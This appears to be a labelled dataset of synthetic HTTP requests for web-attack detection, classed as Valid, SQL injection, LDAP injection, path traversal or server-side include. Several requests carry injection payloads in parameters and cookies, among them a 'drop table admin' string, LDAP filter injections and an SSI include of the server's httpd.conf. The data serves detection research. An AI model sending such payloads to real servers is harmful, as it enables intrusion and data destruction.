Warning: 804 223.86.45.215 "nulraOi9titRoel" "Wed, 09 Dec 09 07:48:07 CET"
X-Forwarded-For: 147.125.181.72
X-Serial-Number: 818940289037897740
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20153
Start - Id: 38754
class: LdapInjection
GET /uCpWBt/ulshyn0fbsewatrafooc/bIKZC30NKwHgJge/ijFkuDYikgEsczwG7/2uowp-qGbgsoundJL.sh?Td46fnrcaehc=m4iGo&eThLnfnstoq=28&3rtfl=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29 HTTP/1.0
Host: www.dbenollj.be:80
Connection: fp2gdy
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip;q=0.5
Accept-Language: *
Cache-Control: max-age=92432
Client-ip: 111.176.120.104
Cookie: Etrd=nz;reah0TsoTdl=ded;eOoanxseSeHj=ftstpasswd;Oraofeoh1Xsofob=mlatt o0execrreetl;ecn3AhsgF1sG=i2ra
Cookie2: $Version="4"
Date: Sun, 08 Feb 04 22:48:09 UTC
ETag: "b2R@sMIXD.Z0eAZ@-tX"
Expect: 100-continue
From: Dddcd@u4uew8d4.be
If-Modified-Since: Tue, 02 May 06 15:44:31 GMT
If-Unmodified-Since: Sun, 19 Feb 06 14:14:40 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 0078
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: Digest nc=d1acEBc7
Authorization: Basic dGVsYTpxdGNy
Range: -6168,6-
Referer: /cndi/Olsaa.jpg
TE: gzip;q=0.8,trailers
Trailer: Date
User-Agent: Mozilla/3.6 (X11; U; Linux i386 7.6; lo-6e; rv:6.9.8) Gecko/89156593
UA-CPU: Sparc
UA-Disp: 8384,101,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 8698x991
Via: HTTP/0.8 www.atuunIy.htm, 7.9 9.144.248.252, HTTP/5.6 www.twroa.css
Transfer-Encoding: notx
Upgrade: eihbsv/2.5, adsr/9.3, od6ng/8.7
Warning: 623 118.59.242.63:0920 "rowFrsl" 
X-Forwarded-For: 205.210.81.15
X-Serial-Number: 99237184639
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38754
Start - Id: 30800
class: Valid
GET /1Jh/tsH.rfUtivX/peue5dWtdoss1ea/fordD.my/CTNxn9Ctupdatemochareplacehtaccespseval/uqynNTDB/rtFcRrvT0Tf9604mQ.html?it=yij2l.gpa&ghTn6cm=s7H8-eEPLMvR&iweescd3shAhn9x=lhco&eeo1EeiJAai=fapsaeis8updatef%29my&lnslnexnaee7e7l=3867695&orogntvaScuate=fHOnbdshhEsirn&dLduaoo8a=+6usr%3FH&nr=nDyoQpucBU&ane75seodseiiH=+s HTTP/1.0
Host: 156.127.189.131
Connection: keep-alive
Accept: audio/*;q=0.1, audio/*, application/*
Accept-Charset: utf-8, x-mac-chinesesimp, windows-1258, gb2312;q=0.8
Accept-Encoding: 
Accept-Language: itBx-oss;q=0.0, ehunde-nohrF2u9;q=0.2
Cache-Control: min-fresh=77
Client-ip: 231.34.18.232
Cookie: tea=2
Cookie2: $Version="8"
Date: Sun, 29 Jun 08 21:57:59 CET
ETag: "r8GbOFMovVI_ULq"
Expect: Ntiuo5t
From: eauh@chhrgB5dy.biz
If-Modified-Since: Sat, 25 Oct 08 23:04:06 GMT
If-Unmodified-Since: Sun, 18 Sep 05 10:16:00 GMT
If-Match: *
If-None-Match: *
If-Range: "NUu.CbdcflB9H_K"
Max-Forwards: 234
MIME-Version: 6.9
Pragma: 8fyt0='eoyn'
Proxy-Authorization: nuit2t Ja4ekbcr=ksnl
Authorization: Digest qop=aarrs
Range: 40-,5809-053,-843
Referer: http://www.sobrdroa.uk/mudEe/uiidip3/eawgzo/rrogppd/oohtoar.tar
TE: trailers,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/8.9 (Machintosh; U; Mac OS X 4.0; js-ev; rv:5.9.5) Gecko/71257374
UA-CPU: 68000
UA-Disp: 411,4178,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 0063x004
Via: 4.4 www.utch3.js, 6.0 216.133.190.135, HTTP/0.1 146.202.44.102:0
Transfer-Encoding: nsz2; wrsw0Z=ibc8
Upgrade: uIT/1.8, hdv/9.8
Warning: 732 112.144.58.134 "HhNnuq" 
X-Forwarded-For: 226.201.113.37
X-Serial-Number: 277433290484890410
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 30800
Start - Id: 12249
class: Valid
GET /ailfdgoaOb5li6p/j5.8x/eeRv4iE/phpNjLcp/t7ag-76W/e-chMK.swf?MbYHEaT3ai=cqyfn&onyo=location&seTwAlznPDy=htacces%26dE%27AEpatmpoo&kdropPall0Ku8Y=e%3FmSd3mtnnn&@PQT0FB=2087&0U=e&esips6Gd5sxtide=3ESHx9VXT&4noshe=i.Mm5Hc&qOAa=openeps%3Ams&e3h7Mawrmh=uahholifKtiE&nonnYetocoesS=ee8mH5oeritnpnore&ceTt=ol77cGR&nAcnk1wst=hi85-%3C8t3eqs6b4%3Fn&r_c1FMuk=e9ds HTTP/1.0
Host: www.nytaatr.uk:8727
Connection: close
Accept: audio/basic, audio/x-wav
Accept-Charset: *;q=0.7
Accept-Encoding: gzip;q=0.8, identity;q=0.5, gzip, compress, compress;q=0.0
Accept-Language: a-mnlycaia;q=0.1, bmagrem-Ddqi;q=0.1, m7Oci-7ee;q=0.6
Cache-Control: no-transform
Client-ip: 251.112.24.90
Cookie: mNcou=6801948;ttTfnstzse10s=976;ehe= d:i;eea=hpeyeiIrytr8pf;;atdwhehtSnlwLcr=iiad9e;eli8jxeomne=715
Cookie2: $Version="8"
Date: Sun, 23 Dec 07 11:06:44 CET
ETag: W/"xj9bPbOfBXF0mYAiX9aB"
Expect: dloUrn
From: tRmfo@Moomaa.cz
If-Modified-Since: Mon, 07 Nov 05 04:22:10 UTC
If-Unmodified-Since: Wed, 03 Nov 04 11:56:02 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 16 Nov 09 02:43:36 CET
Max-Forwards: 0
MIME-Version: 1.6
Pragma: nobasd=lea5af
Proxy-Authorization: NTLM ZG50dHJ2ZGhhaWF1ZWFiZG5Jd3Bhc2VPb1R3aGNub2VuYXNvRWlkbHJ3Y3NucA==
Authorization: zn5f8a zedOwr=fet0te
Range: 59-,042414-38,-0351
Referer: http://rwrer.it/t3tflmi/luts/HEnez/epla/oilCeL.mdb
TE: gzip;q=0.9
Trailer: Expect
User-Agent: Mozilla/6.1 (Machintosh; U; PPC Mac OS X 9.8; ya-oe; rv:8.9.8) Gecko/58021659
UA-CPU: Sparc
UA-Disp: 2614,437,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 7901x792
Via: 0.5 www.ai9segll.html, HTTP/6.1 135.217.17.223, 0.0 245.202.37.72
Transfer-Encoding: gzip
Upgrade: slsTt/6.9
Warning: 176 125.171.28.119 "rAswf" "Thu, 16 Oct 08 01:05:52 GMT"
X-Forwarded-For: 93.31.136.215
X-Serial-Number: 8899123917889
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12249
Start - Id: 32655
class: Valid
POST /lMqq7HEAW/iwWHM.UrPPwF1p.Ketl/frDY@MLIdocumentg/vd7hziofWc8nnsetP/ok.css? HTTP/1.1
Content-Length: 17
Content-Language: 8yrie,vOdnntD,ena
Content-Encoding: deflate
Content-Location: /iSpdndu/nqixi/a8oif/oOhmue/oDymths.exe
Content-MD5: b0FjSWk0aHdvNTJpaXNoMg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 16 Feb 05 14:45:26 GMT
Last-Modified: Fri, 13 Feb 09 06:59:11 CET
Host: www.yloEeer0wi.biz
Connection: nlha
Accept: video/*
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: o-t, ea-lyr, heUi4cn-eIesjtO;q=0.8
Cache-Control: oee=ubnAlEdo
Client-ip: 189.11.42.175
Cookie: I.VDI1rmq@2Wu=83828;EmdeojsRa29=7;eAae8efisi8r=tPXu6jN;0O=r7wn3ne;;osainaTrs5elalw=3365
Cookie2: $Version="661"
Date: Wed, 10 Mar 10 11:38:53 CET
ETag: W/"7mi5OAs0K0qMM3hK"
Expect: 100-continue
From: t8whu@dszw.biz
If-Modified-Since: Sat, 11 Nov 06 08:12:00 GMT
If-Unmodified-Since: Wed, 17 Dec 08 01:21:12 CET
If-Match: "JENLC5b22pp0OcaIW"
If-None-Match: "1bfhF2yW.az17g.WSGj"
If-Range: *
Max-Forwards: 4
MIME-Version: 6.2
Pragma: rtn=9roEnTtj
Proxy-Authorization: Digest cnonce="5slteix"
Authorization: Digest qop=auth-int
Range: 5-,-81662,01479-
Referer: /nMfgern/saefbsu/atth65/ahoHna.png
TE: gzip,trailers
Trailer: If-None-Match
User-Agent: Mozilla/1.1 (Machintosh; U; PPC Mac OS X 1.5; ad-ea; rv:0.9.6) Gecko/76265022
UA-CPU: PowerPC
UA-Disp: 530,9577,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 853x924
Via: ong/0.4 240.4.82.80
Transfer-Encoding: gzip
Upgrade: te2awz/6.1, cn0U/1.6
Warning: 166 182.140.231.49 "qo7ntkcIsaeidh7" "Thu, 17 Feb 05 17:04:23 CET"
X-Forwarded-For: 57.135.97.53
X-Serial-Number: 108492
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

hte8uici=74622824

End - Id: 32655
Start - Id: 36271
class: PathTransversal
GET /OIxpasswdiOROZ.js?kbwir=N%3A%2F.htaccess%7E HTTP/1.0
Host: www.ueeh.uk:80
Connection: keep-alive
Accept: */*
Accept-Charset: macintosh;q=0.9, x-mac-hebrew, hz-gb-2312;q=0.0
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 117.40.148.200
Cookie: TtleHho8edth=ncUbvxu.GrH;37=itsGe;d4t9iRlijkzt=' s7Ee;TmHgYWpsCO21=95962317
Cookie2: $Version="704"
Date: Tue, 28 Dec 04 08:58:42 CET
Expect: 100-continue
If-Modified-Since: Tue, 09 Mar 10 06:35:55 UTC
If-Unmodified-Since: Thu, 30 Nov 06 21:00:47 CET
If-Match: "SpAoDzyAQqMW2Mu"
If-Range: Wed, 19 Sep 07 04:56:44 UTC
Max-Forwards: 091
MIME-Version: 1.2
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: MndaWr e9nrTe=deg9
Referer: http://www.jtnd.st/jcgkDes/aftd/u0rlAe.cgi
TE: trailers,trailers
User-Agent: mxGCZS http://www.ecHTAo.de
UA-OS: Solaris
UA-Pixels: 6917x927
Transfer-Encoding: identity
Upgrade: t6a9mC/0.8, isrjmh/3.6, Wb7h6/0.9
X-Serial-Number: 3858869813582017
----: ----------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 36271
Start - Id: 27562
class: Valid
GET /Tall56@A9C_W5Hq/ne45Ji6nklo8M9ntgeeV/asil2b/notuhfsteurghnovdes/8hpNsnYTZC81_7/zLeQULlK/uvcshutdownvshutdownmOaksTWgA/tUny0/oCYNBirl@N0AaHeWOgr/1euoazv/TYo.png?ee7o=r2Mv&aiHessdnmmaw=975&boeEbm=592070&cIe=qwndxyugpieTne&nSsroseg6os=rOd&ywtntstrnebe=olofoHgepymz&NeTmna=erytougwlsa&i2=70&lC=s8onPiTUa17naoliri&caenpnsstcssb=ts&qthMbeUn=f96PJ3Lab&roes=r3i HTTP/1.0
Host: www.ia7or.biz
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: only-if-cached
Client-ip: 43.118.104.43
Cookie: eien=rrgg6objectaps
Cookie2: $Version="6"
Date: Thu, 26 Feb 09 19:26:35 CET
ETag: "_CtKP_aWn3iEvCqEKpQy"
Expect: shete=A2xRIa9
From: rn1otcn@tde51wqd.st
If-Modified-Since: Mon, 04 Jul 05 07:08:11 CET
If-Unmodified-Since: Mon, 05 Nov 07 05:49:34 CET
If-Match: *
If-None-Match: ".dhagL1w-c8FSUYV"
If-Range: "dcwF364jqM5QStER-G"
Max-Forwards: 6
MIME-Version: 2.1
Pragma: dse5atet=shohrt
Proxy-Authorization: Basic bWF0dGE6b2VzdA==
Authorization: NTLM ZWhlbmJhZW5BbGxhc21uc29zbHJoYWV3aWZnYUlNaFJ1c2o=
Range: 0-33,159-222311,3856-
Referer: /au9tmisu.bin
TE: deflate;q=0.2
Trailer: If-None-Match
User-Agent: dnOtnft7hr/5.2.6.4
UA-CPU: 68000
UA-Disp: 883,733,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 4534x344
Via: HTTP/7.6 241.129.162.21
Transfer-Encoding: compress
Upgrade: tqtyi/0.3, 5aftHf/0.4, ifhtn/3.3, ntdsF/5.0
Warning: 197 179.125.106.204:45943 "tentotelsaAsctyrRtpu" 
X-Forwarded-For: 49.154.202.141
X-Serial-Number: 76901665181608584434
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27562
Start - Id: 41298
class: SqlInjection
GET /n28eH2OYinMg/s6yHuE9OxwM94dwleAOf/fvgesxw/oX-GLZc.mdb?SleM=uoq8yn&4ualttelual9=hb1&ttea=%279oase+octrqgroup+by%28ki&cgl=46ceio%3Fr&EcBFGrQh_v=22799&aMP=4188&rEd4=ydot&eRoes=yuicheojdeScs&sdn=tz2jIE2s&eeut=298&juri=725462 HTTP/1.0
Host: www.txhmoeesk.net:9068
Connection: h6uipsh
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: sbr-dI, hnu-i;q=0.3, 6pEtt-e2i6gs
Cache-Control: max-age=122
Client-ip: 5.85.153.146
Cookie: eaua6a=';    drop    table    admin;wianit=805450577;enNeldehe=<sscI;ddd02sslgep=hiee;zlesueyes=)o;enego=5485
Cookie2: $Version="3"
Date: Sun, 26 Feb 06 20:09:13 UTC
ETag: "JhjNr2i1GthRTBS"
Expect: eiE7lece=iaq5e;ais3gwt=reznwiro
From: 7jtnsEc@oHtbtu9a.biz
If-Modified-Since: Sun, 15 May 05 21:05:45 GMT
If-Unmodified-Since: Sun, 22 Apr 07 10:19:10 UTC
If-Match: "ao@lot5T@GtQeWiB-k7i"
If-None-Match: *
If-Range: Sat, 21 May 05 14:53:52 UTC
Max-Forwards: 76
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: Digest nc=d3fB77dE
Authorization: Digest algorithm=bonEh
Range: 1-,9-8
Referer: http://www.futslTwm.net/gofq/wcdn/drr4.cfm
TE: gzip
Trailer: User-Agent
User-Agent: uYzTho http://www.Onnenh86.com
UA-CPU: MIPS
UA-Disp: 8902,8291,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 470x0638
Via: 5.8 195.97.144.183, HTTP/7.5 221.13.16.68:0807, FTP/0.9 www.q9ohatqe.jpg
Transfer-Encoding: compress
Upgrade: e1em/3.9, othbu/3.3, yin/5.4, shfedi/0.7
Warning: 991 www.oeOiE.shtml:7 "iedetaN" 
X-Forwarded-For: 0.5.238.60
X-Serial-Number: 99307036492325759306
----: ----------------------------

null

End - Id: 41298
Start - Id: 39019
class: LdapInjection
POST /aP.L7ojP3r5TOctzmE/lLarY/gC/tUteYsd/fNshUdzZ/yett/IuW/ZYp9aO/nhy1atyo0zun6ywIEhd/inputKnc2xtermL/ictiqeq9i6H.tiff? HTTP/1.1
Content-Length: 73
Content-Language: pn
Content-Encoding: deflate
Content-Location: http://www.1cle9.be/dshn/lamgv/h3usA/dsl3/Rcri.conf
Content-MD5: bmdzZWN1c25lZWllNXNpMw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 04 Nov 09 14:43:55 CET
Last-Modified: Sat, 10 Jan 04 10:41:06 GMT
Host: www.agsyt.it
Connection: e4nE
Accept: */*
Accept-Charset: macintosh
Accept-Encoding: *;q=0.4
Accept-Language: )    (    |  (  cn=*o'brien* )(mail=*o'brien*    )  
Cache-Control: max-age=8186
Client-ip: 139.202.31.208
Cookie: nshiodheee=Cviae cee qu[ro;mbeGu5tdar66=$K;r2x=]hi2;@8HnkeeE=7;sjftmowd1283tar=897838
Cookie2: $Version="997"
Date: Thu, 03 Jun 04 14:49:34 UTC
ETag: "_amSqjkXZhP962hMUm13"
Expect: eQea
From: rtYnihG@mn4eem.gov
If-Modified-Since: Mon, 03 Jan 05 22:04:05 UTC
If-Unmodified-Since: Sun, 05 Aug 07 02:35:06 UTC
If-Match: "Zg44Z2A.QOrP0I8b"
If-None-Match: "mBI5uJSCNlxuBVZb-"
If-Range: *
Max-Forwards: 329
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: Basic bHNlcG06Z3Nob2V6bmM=
Authorization: NTLM OWhpc2VnaG9hdmROcjZhbmxqdG5hZ2FzbkhyMG84dGh0ZnBl
Range: -085
Referer: /tpqozs/Woaerr/hddNr/rauRcy/mxuv.wmn
TE: chunked,chunked
Trailer: User-Agent
User-Agent: Mozilla/8.2 (compatible; Konqueror/3.9; Linux i386; Co3toTk; fnanOtsn; E6hpailmf)
UA-CPU: 68000
UA-Disp: 744,650,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 960x5747
Via: 7.2 104.77.245.30
Transfer-Encoding: identity
Upgrade: yuanig/5.9, tImh/5.1
Warning: 562 166.100.218.31 "elnelas" "Mon, 19 Dec 05 03:33:45 UTC"
X-Forwarded-For: 145.87.92.159
X-Serial-Number: 13381334
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

Fusenke8wane=lNrn]wesha7hic&fDsZmocha6=htaccesw f heotk8whereea0pl'fh

End - Id: 39019
Start - Id: 37842
class: LdapInjection
GET /rqer/ytdrxcteqhadic/0Hm2jRAargIZRUPkeaA/dlilyfXcdhr/2@W.deleteFA_MM85access_log/r2GO.html?CL7R-KjO=9edtlp&hjk=+%5C&N3ytns=eform&2Q5tmpvL4R=%5Doea5bsil&tmsu=vdll%29%28%7C++++%28zoi%3D*%29 HTTP/1.0
Host: www.e0hrine.cz:1185
Connection: close
Accept: image/*;q=0.6, image/gif;q=0.2, image/*;q=0.1
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.6
Accept-Language: *;q=0.8
Cache-Control: nelst='trmoredq'
Client-ip: 2.231.54.23
Cookie: sbadomOuloan=o|bscriptspmiEet;rehbii86tmyfwm=exec;itnstkgn8mrulet=netcathnph-eees;veednddk4se=42;SYcni0G=fnehqalaemtnaattia;o0taoseyTacNwt=577
Cookie2: $Version="033"
Date: Mon, 25 Sep 06 21:38:04 UTC
ETag: "v.u7W79d5gfnlTy"
Expect: dNnesabo
From: tlocso@Staohr.gov
If-Modified-Since: Thu, 22 Apr 04 01:32:46 UTC
If-Unmodified-Since: Fri, 09 Mar 07 23:25:53 CET
If-Match: *
If-None-Match: "XBOcKZN7Bz3uM7Yy"
If-Range: Mon, 09 Aug 04 18:11:19 CET
Max-Forwards: 27
MIME-Version: 4.8
Pragma: a8veae=fheo
Proxy-Authorization: xDzhen at43Wr=te5gtta
Authorization: heSa3 rjareht=wbJenp6g
Range: 853418-,-430
Referer: /nOieito/mTlooA.conf
TE: trailers
Trailer: Accept
User-Agent: Mozilla/8.2 (Windows; U; WinNT 3.3; sm-3k; rv:9.6.7) Gecko/24460334
UA-CPU: 68000
UA-Disp: 780,4386,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 707x739
Via: 7.4 61.98.87.250, FTP/1.6 34.17.157.12, 1.8 189.134.7.1:02
Transfer-Encoding: foctbw
Upgrade: msdjj/6.3, nhneNR/6.0, amsilt/6.3
Warning: 819 www.pedj.gif "e9rth" "Tue, 15 Sep 09 22:46:26 GMT"
X-Forwarded-For: 138.39.90.47
X-Serial-Number: 52385869909
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37842
Start - Id: 39793
class: SSI
GET /rW/nf0et/pRPNep/vumohthy/osifknrhoWa4nuioskZ5/a6uettuttaiel/xOZwvHkwOf1W9bO/aREO5xloMMhH.mspx?3KdIZ=3opt&vytakfoe=nesqrm&SdeAW=nnts%29&TytItcasNwofi=49&csbigpLl=hRtEh&include3UEBcrJZh_=ttd&AseP=06465360&eorrs4io=53&ase1e=pdisa&yobuzo=%3C%21--+%23include+++++virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22+++--%3E&sNneto=stobt1lbaa1b&nLpositionXOpa9JCm=9015212266&Bwelf24Sasre9=dRrelc&gor68arjCmb=5ueEntV HTTP/1.1
Host: www.yNbwwfsady.org:80
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: identity;q=0.8, deflate;q=0.6, identity
Accept-Language: *
Cache-Control: max-stale=9410
Client-ip: 129.26.179.125
Cookie: me=hnhitaaaselect;heneiia7tatbial=ns@YYrNu;nr=4404926;xik=o2GvR0c3pPxH;sznrreiahho=0dlEr
Cookie2: $Version="9"
Date: Sun, 15 Oct 06 05:03:00 GMT
ETag: "1MI3X5pRIo3ZW19eTlb1"
Expect: 100-continue
From: otit3le@ijlhneot1o.com
If-Modified-Since: Mon, 29 Aug 05 21:29:12 GMT
If-Unmodified-Since: Sat, 25 Apr 09 15:44:44 GMT
If-Match: "bHJKkxda8xbD6vUFfSP"
If-None-Match: *
If-Range: Mon, 14 Feb 05 17:45:30 UTC
Max-Forwards: 0174
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: Digest nc=Ca5d26eD
Authorization: Digest realm
Range: 538-81062,0-593619
Referer: http://www.iecrYeb.org/acBanl/ikymAw/hstg05/bigsn5nc.msf
TE: gzip;q=0.7,trailers,gzip
Trailer: Upgrade
User-Agent: egs19So (toFcy76c_K; gsq_AhT75)
UA-CPU: Sparc
UA-OS: Solaris
UA-Pixels: 468x7869
Via: c4ri/1.9 225.155.14.245, oubre/8.1 www.timhc.tiff:74613
Transfer-Encoding: gzip
Upgrade: oLt/5.9, tEgb/6.9, 6laet/2.7, faare2/0.4, vst20/6.5
X-Forwarded-For: 203.248.148.225
X-Serial-Number: 39977076241136
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39793
Start - Id: 33926
class: Valid
POST /p1pZKD6m/j06gEVyyQHa/tsegeleq7et7eset/sVYo2zRmYxL/le6t3rhfr/l1O9MtQfLO/EeOscript1tv0n9f9wo/hWS5Nlf1cw..php3? HTTP/1.0
Content-Length: 190
Content-Language: zsdo6,aRecgN,5C
Content-Encoding: gzip
Content-Location: http://www.xPtoirf.st/enQm/sOeoehn/wupey/Rsbeob.gz
Content-MD5: Ymhkc2VPZlNTR2pNZXlzOA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 23 Feb 10 01:36:55 UTC
Last-Modified: Sun, 12 Jul 09 13:21:22 UTC
Host: www.e1eeon.com
Connection: keep-alive
Accept: video/quicktime, image/*, application/zip
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: 68rnrxr-ld, tlaj7-t23s;q=0.2, 2iettja-czstcmd;q=0.1
Cache-Control: only-if-cached
Client-ip: 209.129.239.30
Cookie: cju=3366223768
Cookie2: $Version="74"
Date: Fri, 28 Oct 05 15:02:14 GMT
ETag: "OXFSextK3FfDi7h"
Expect: t3swm=Toyil
From: faUspl3@yqiAa4o.it
If-Modified-Since: Tue, 09 Aug 05 13:52:40 CET
If-Unmodified-Since: Tue, 02 Jan 07 04:38:27 UTC
If-Match: *
If-None-Match: "RBDwwWPr1p.Io_3rO"
If-Range: *
Max-Forwards: 364
MIME-Version: 7.8
Pragma: njl7Kk='onSolsoE'
Proxy-Authorization: ddre3t eDfhi=ueIeutii
Authorization: Basic b2IxejpBdHNkcmU=
Range: -996,858-589875
Referer: /ls1So/2nrAh/tiyor/2rhnrymi/omaz.asmx
TE: gzip;q=0.0,gzip;q=0.1,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/3.4 (Machintosh; U; Mac OS X 6.0; dr-mi; rv:8.1.9) Gecko/70859057
UA-CPU: x86
UA-Disp: 4653,644,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 1982x002
Via: 9.5 www.wbaslD.gif, 5.6 216.3.68.160, FTP/2.7 101.51.52.235:26014
Transfer-Encoding: deflate
Upgrade: mtiv/1.9, Samgmt/6.9, enjtl/7.4
Warning: 795 168.131.85.71 "htNrsta0stixj" "Thu, 18 Mar 04 22:40:39 GMT"
X-Forwarded-For: 7.63.26.112
X-Serial-Number: 346952667269
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

arregfgElr4o=dcShnoetotn&8IcnofaronNqR=wcpi&lhml9Mrihrro4ee=62667671&egntoihhaciiomh=t3M5mXXX&zuti=ene&t4tcNra1Sn=1265570&oYthuhbear=l&t2Os=ebZ&ii=87929&t1r=gHH7tftnyleo&kcmsDtogoeasn=jrmted

End - Id: 33926
Start - Id: 21813
class: Valid
GET /chhHf4QKbAKPk.cgi?3v_Yw6z=%5Ceaccess_log%27&fko8aTev2U=247&tcl8udl=udrop&wfwe0bg7onlozp=+eeh%5Bo&ap6esechthsdu=neidhyoawtset9 HTTP/1.0
Host: www.untmo.uk
Connection: keep-alive
Accept: video/mpeg, image/gif
Accept-Charset: *
Accept-Encoding: deflate, compress;q=0.0, compress;q=0.7, identity, identity
Accept-Language: *
Cache-Control: max-age=5
Client-ip: 196.172.163.174
Cookie: dl=aIm_fG8ta
Cookie2: $Version="412"
Date: Sat, 23 Dec 06 19:29:49 GMT
ETag: W/"h2ZOQ8GkeMdfl7Omwh"
Expect: e9ns
From: qn7fi@stAorh.org
If-Modified-Since: Thu, 15 Dec 05 09:35:21 GMT
If-Unmodified-Since: Thu, 29 Oct 09 23:56:51 CET
If-Match: "G8GhglZlq395IVA7M"
If-None-Match: "qfYyj.PQ1jJFO1mvxD0W"
If-Range: "gk4wh8fcxwRRJU6RCO3a"
Max-Forwards: 7
MIME-Version: 1.2
Pragma: oflceuLr=af1c
Proxy-Authorization: NTLM cXJlYXNDbkE2enhlbW40aHI0emdld2hlb296aWU3bm4=
Authorization: seuesq RrdXiyhh=ooi6v
Range: 728147-66,8714-380,41-
Referer: /iCotgco/d4q0t.txt
TE: chunked
Trailer: Accept-Charset
User-Agent: zsslqieee (sGhUifq0k; jbjXr.t)
UA-CPU: StrongARM
UA-Disp: 488,0035,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 777x599
Via: 0.8 11.126.27.101
Transfer-Encoding: compress
Upgrade: eAsu/5.0, gdb/6.1
Warning: 052 www.rdtt1ah.js "6g169" 
X-Forwarded-For: 32.5.142.115
X-Serial-Number: 8436166703567420278
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21813
Start - Id: 15831
class: Valid
GET /8C_tBk5NpH/5QE7KV-/non61Rwleybimce/cWtlnaiin1o.cgi?6o7crvklat=e8eqooniafmaiehqu HTTP/1.0
Host: www.te9tta1.ch
Connection: keep-alive
Accept: video/*, application/rtf;q=0.7
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: no-transform
Client-ip: 216.182.221.89
Cookie: uojm=24;ws4lu6yl0noEmig=ss ojaRnunm;bgmfdiiTaffn=dh4;loo=yboot.iniueRltytd
Cookie2: $Version="6"
Date: Sun, 27 Mar 05 23:39:22 CET
ETag: W/"oDsk_UrglY1uPIVN8_e"
Expect: 100-continue
From: ueo4hmt0@eibOany.com
If-Modified-Since: Mon, 22 Jun 09 04:37:23 CET
If-Unmodified-Since: Sat, 07 Aug 04 13:23:45 GMT
If-Match: "2rSQ-5OIw-BRXmJ"
If-None-Match: "1FnLbfKVJAKhNR7cl3cs"
If-Range: "kuBXRQ9HVuEQVHMfK"
Max-Forwards: 4982
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: Digest username="tnelie"
Authorization: Digest nonce
Range: -630,9-,363-
Referer: /iGln6/p6msm.tiff
TE: trailers,deflate,deflate
Trailer: If-Unmodified-Since
User-Agent: cteieoeoem
UA-CPU: 68000
UA-Disp: 3222,4414,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 132x8371
Via: 7.3 www.raGb2sa.html, FTP/5.2 www.ahAi.tiff
Transfer-Encoding: deflate
Upgrade: tnsap/4.9, hb3i/7.3, teoa/7.0, yetn/8.3, dof/3.7
Warning: 734 www.a4hol.gif "8eiyls3tra8i3ro" "Sun, 10 Sep 06 06:04:47 CET"
X-Forwarded-For: 30.73.53.136
X-Serial-Number: 6066558353005235
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15831
Start - Id: 10071
class: Valid
GET /hMwAUqopdsHlXtE5D/8dN-ntQyhxMbJwg/lee/sheEz3gzww/hnnvzl/ZreB3o29GQVAmqF/yWFo0EBlqZGp@m-8HzcE.css?6L5ciff=90618732&ebwhluerhkdu=8162 HTTP/1.1
Host: 193.2.22.58
Connection: close
Accept: */*;q=0.4
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: min-fresh=043
Client-ip: 48.81.203.195
Cookie: Chissh=a\iS
Cookie2: $Version="231"
Date: Thu, 31 Dec 09 18:35:38 UTC
ETag: "P@XL.-O7FGmMYKdg"
